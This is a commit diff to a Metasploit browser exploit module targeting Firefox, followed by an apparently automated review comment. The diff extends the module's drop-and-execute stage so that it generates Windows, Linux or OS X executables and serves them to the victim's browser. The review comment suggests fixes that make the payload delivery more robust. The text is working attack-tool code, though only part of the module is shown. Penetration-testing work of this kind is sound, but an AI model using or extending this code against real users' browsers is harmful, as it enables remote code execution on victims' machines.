
Commit 6786179

committed
Fix automatic payload selection
1 parent 23fe314 commit 6786179


1 file changed

+25
-8
lines changed


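--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -33,12 +33,15 @@ def initialize(info = {})
 with script access should be able to trigger it.
 },
 'License' => MSF_LICENSE,
-'Platform' => 'win',
 'Targets' =>
 [
-[ 'Automatic', {} ],
-[
-'Windows x86 (Native Payload)',
+[ 'Automatic',
+{
+'Platform' => ['win', 'linux', 'osx'],
+'Arch' => ARCH_X86
+}
+],
+[ 'Windows x86 (Native Payload)',
 {
 'Platform' => 'win',
 'Arch' => ARCH_X86
@@ -61,7 +64,8 @@ def initialize(info = {})
 'Author' =>
 [
 'Marius Mlynski', # discovery & bug report
-'joev' # metasploit module
+'joev', # metasploit module
+'sinn3r' # metasploit fu
 ],
 'References' =>
 [
@@ -98,7 +102,7 @@ def on_request_uri(cli, request)
 elsif request.uri =~ /\.bin/
 # send the binary payload to drop & exec
 print_status("Child frame navigated. Sending binary payload to drop & execute.")
-send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
+send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
 else
 # send initial HTML page
 print_status("Target selected: #{target.name}")
@@ -109,9 +113,22 @@ def on_request_uri(cli, request)
 end
 
 # @return [String] the encoded executable for dropping onto the client's machine
-def dropped_file_contents(cli)
+def dropped_file_contents(cli, target)
 return if ((p=regenerate_payload(cli)) == nil)
-generate_payload_exe( {:code=>p.encoded} )
+opts = target.opts
+exe = ''
+
+case target.name
+when /windows/i
+opts = opts.merge({:code=>p.encoded})
+exe = generate_payload_exe(opts)
+when /linux/i
+exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
+when /os x/i
+exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
+end
+
+return exe
 end
 
 # @return [Msf::Module::Target] that matches the client's user-agent header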
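Review bot: The `case target.name` added to `dropped_file_contents` has no `else` branch, so a target whose name matches none of the three patterns falls through with `exe = ''`, and `on_request_uri` then sends an empty octet-stream body without logging anything. The 'Automatic' entry is such a name; whether `target` has already been resolved from the user agent when the `.bin` branch runs is not visible in these hunks. An explicit `else` that reports the unmatched target, for example `print_error("No executable format for target #{target.name}")`, and returns nil would make the failure visible to the operator and keep it consistent with the nil returned when `regenerate_payload` fails. The YARD comment above the method still documents only `@return [String]`; it should gain `# @param target [Msf::Module::Target] the target selected for this client` and say that nil is returned when the payload cannot be regenerated.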
